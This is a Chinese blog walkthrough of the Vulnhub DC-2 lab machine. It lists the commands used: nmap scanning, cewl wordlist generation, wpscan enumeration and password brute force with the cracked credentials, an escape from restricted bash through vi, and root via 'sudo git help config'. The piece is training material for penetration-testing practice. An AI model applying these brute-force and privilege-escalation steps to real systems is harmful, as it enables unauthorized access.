DC-2 靶机

已于 2022-08-16 00:38:28 修改
阅读量1.2k 收藏
点赞数
分类专栏: vulnhub靶机之DC系列 文章标签: web安全
于 2022-08-16 00:33:29 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_56171651/article/details/126357355
版权

DC-2 靶机

首先进行信息收集```
nmap -sS -A -p- 192.168.174.154 #识别目标主机服务,端口
-A 全面系统检测,启用脚本检测,扫描等 (更全面吧)
nmap -sS 192.168.174.0/24 扫描存活主机
nmap -sP 192.168.174.0/24 同上
(使用 -sP ,-p-参数进行扫描扫描出了一个7744端口,当时并未反映出是ssh,
所以扫描ip的话还是用nmap -sS -A -p- 比较全面)
#使用如上命令扫描后访问不了80端口 Did not follow redirect to http://dc-2/
发现dns还不能解析,故配置hosts文件(一开始看到没想到,要敏锐一点)

#kali重启网卡命令:systemctl restart networking
能够访问80端口看到flag,提示使用cewl

cewl-kali自带密码生成工具

#cewl -w dc2_passwords.txt http://dc-2 #生成字典
注(一开始我也是这么想使用御剑扫描出敏感目录,但方向没找到)
在确定是worlpress 使用wpscan工具扫描,枚举出用户
wpscan --url http://dc-2 --enumerate u

查看到有哪些用户

wpscan --url http://dc-2 -e u,其中-e表示枚举,u表示要扫描的目标:用户名

#进行密码爆破,爆破出 Username: jerry, Password: adipiscing
| Username: tom, Password: parturient

wpscan --url http://dc-2 -P /root/桌面/dc2_passwords.txt -U /root/桌面/dc_2-user.txt

#使用dirb工具进行目录扫描,扫描出登陆窗口

#拿到flag2提示无其他漏洞,根据前面的7744猜测为ssh,进行连接
ssh tom@192.168.174.154 -p 7744 连接到tom,发现cd命令,ls命令等无法使用推测,发现是一个rbash也就是受到限制的bash,那么我们就要绕过bash
具体绕过:使用vi 3.txt(随便创建一个文件)
进入vi编辑器,输入:set shell=/bin/bash
再输入shell退出
执行命令 输入环境变量 export PATH=$PATH:/bin/
那么可以执行受到限制的命令,但并未获得root权限

使用sudo -l 用于显示当前用户可以用 sudo 执行那些命令,而不受权限限制

发现能使用git 搜索git提权 https://gtfobins.github.io/gtfobins/git/#sudo

执行命令
sudo git help config
!/bin/sh
获得root权限,拿到flag
LLHSKY
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Vulnhub靶机实战——DC-2
冠霖L的博客
09-27 4661
靶机DC-2下载地址:https://download.vulnhub.com/dc/DC-2.zip 描述:靶机DC-2与DC-1一样,共有5个flag,但最终需要root权限才可以找到并查看flag 环境:Vmware 15 Pro虚拟机软件 DC-1靶机IP地址:192.168.220.132 Kali的IP地址:192.168.22...
dc-2靶机练习.pdf
01-02
详细的靶机dc-2练习过程,思路明确,条例清晰, 通过修改hosts进入网站,发现flag1 通过cewl工具对网站生成密码字典,使用wpscan进行密码爆破得到jerry,tom账号密码,登录后台得到flag2 端口扫描发现ssh服务开在7744端口上,使用爆破得到的账号密码进行登录,tom登陆成功,在tom主目录下找到flag3 绕过tom的rbash限制,切换到jerry用户,在主目录发现flag4 使用jerry用户通过git提权,进入root目录找到final_flag
DC-2靶机详解,2024年最新2024网络安全架构面试指南
最新发布
2301_82101171的博客
04-13 265
接下来使用一个工具 WPScan,同样 kali 自带爆破结果,存在2个账户这里可以用dirb工具扫一下有哪些可以登录的页面使用账号 jerry 登录后可以发现 flag2说人话flag 提示,如果 wordpress 打不下来,就得换一个入口上面使用了 wpscan 进行了扫描和爆破,但是漏洞扫描没有任何结果,因为现在 wpscan 扫描漏洞需要 API Token 的支持,所以需要访问 https://wpvulndb.com/users/sign_up 注册一个账号,获得 API Token。
DC-2靶机
m0_62094846的博客
01-29 3430
前面做法和DC-1差不多,信息收集 ifconfig nmap 192.168.61.0/24 输入IP后会跳转域名,但是无法访问页面 发现问题是本地无法解析域名dc-2(看的别人的解释) 要配置可以解析的文件 在命令行中输入 vim /etc/hosts (修改配置文件需要root权限) 要在虚拟机中输入IP才可以,因为文件是在虚拟机配置的 flag1: 提示爆破字典只需要cewl产生的字典即可,并且可能可以爆破出两个不同的账号,可能一个无效 ...
靶机 DC-2
m0_66299232的博客
09-13 1022
rbash是什么?rbash与一般shell的区别在于会限制一些行为,让一些命令无法执行。1>如何设置一个rbashcp /bin/bash /bin/rbash # 复制一个bash,重命名为rbashmkdir -p /home/test/.bin # 在test用户下新建一个.bin目录存放可以执行的命令2>rbash提权export -p //查看环境变量a //把/bin/sh给a/bin/bash。
靶机DC-2 WP
m0_66638011的博客
05-13 523
DC系列靶机是一系列专门为渗透测试和网络安全实验室设计的虚拟机器。这些靶机提供了一系列不同的漏洞和攻击场景,使渗透测试者可以在这些环境下测试自的技能和工具。DC系列靶机包含多个不同的主题,例如各种操作系统的漏洞,Web应用程序安全和无线网络安全等。它们对初学者和专业人士都有很大的价值,因为它们可以帮助他们了解安全漏洞和如何利用它们进行渗透测试。DC-2靶场攻破过程:1、我们先进行信息收集,发现了http协议和ssh协议,更改DNS后进入网页,发现了flag1。
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
dc-4靶机练习.docx
01-02
靶机web信息收集,burp获取登陆用户名和密码。 第二步:利用反弹shell后发现一封邮件,拿到新用户的登陆口令。 第三步:通过sudo -l]发现不用登录root可以使用的命令 [teehee --help][teehee -a]增加用户,具有...
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
DC2-靶机
Au
08-19 1713
下载地址 我配置的环境: kali:192.168.25.131 DC2 -靶机 和 kali 在同一C段 渗透 nmap扫描网段,发现存活主机 nmap -sP 192.168.25.0/24 发现主机 192.168.25.128,判定为DC2-靶机,继续使用nmap获取详细信息 nmap -A -p 1-65535 192.1...
靶机DC-2
weixin_43940853的博客
11-18 204
目标靶机 : 192.168.230.228 kali : 192.168.230.226 发现是wordpress,考虑wpscan 点击flag,根据提示,需要用到cewl 简单的讲,这个工具是利用页面爬取深度生成字典的一个工具 wpscan -u http://dc-2 -eu -et -ep 利用wpscan扫一下用户名(一开始我以为用户名和密码都能扫出来,-ep还以为是passwo...
DC-2靶机
qq_40646572的博客
05-04 1869
信息搜集 通过nmap扫描,发现dc2靶机存在80端口以及7744端口。 通过nmap中的-sV指令发现7744端口是ssh端口。 通过nmap中的script的脚本扫描,发现用户名,先保存下。 打开dc2靶机,发现dns解析错误。配置下hosts文件。 Flag搜集 找到flag1。提示使用cewl爬取单词生成字典。 可能存在Ssh爆破,或者http爆破。 经过目录扫描,发现后台。 通过hydra工具爆破http服务。获取到两个登录用户。 存在两个账号: useraname:
DC-2靶机(新手村)
热门推荐
weixin_42238862的博客
02-14 1万+
马上要开学了,又要去学习奇奇怪怪的古老的知识了!趁机在开学前争取能把靶机多打一点,充实一下自己的假期!那就开始我们的DC系列之DC-2 还是和第一篇一下,起手寻找目标,找到我们需要和谁一决胜负,这里我还是使用arp-scan进行目标机的确定 可以看到这几个IP,由经验可知,目标机是192.168.11.109这个IP。那我们就需要nmap去开路了呀,希望能找到一些可用的信息帮助我们拿到一个小小的shell。 这是我们使用nmap找到的信息,当然得去看看他的网站了呀 然后就看到了这个,这就需要懂得一点点
vulnhub靶机DC-2
Keepb1ue的博客
09-29 2593
靶机配置说明 靶机下载地址:https://www.vulnhub.com/entry/dc-2,311/ 靶机DC1 (VirtualBox) IP:192.168.56.111 攻击机:Kali(VMware) IP:192.168.56.108 在下载地址中也有详细的靶机说明,而FunBox需要寻找的flag总数为5个 靶机环境配置: 还是一样,将其桥接到同一张网卡即可。 靶机渗透开始: kali IP: 第一步还是需要确定目标IP 确定目标ip为192.168.56.111后nmap扫描下端
vulnhub之DC2靶机
LainWith的博客
08-16 1436
靶机概览信息收集nmap信息收集网站信息收集Flag1爬站目录扫描列出站点的用户名、账号渗透攻击爆破后台访问网站Flag2爆破ssh登录ssh绕过rbash拿flag3拿下jerry拿下flag4提权git提权flag5 文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 靶机概览 详情介绍请参考下载地址 任务目标:拿下系统的root账户 下载地址:https://www.vulnhub.com/entry/dc-2,311/ 靶机.
渗透DC-1靶机设计思路
05-24
2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如Nessus、OpenVAS等扫描DC-1,寻找漏洞。 4. 渗透攻击...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值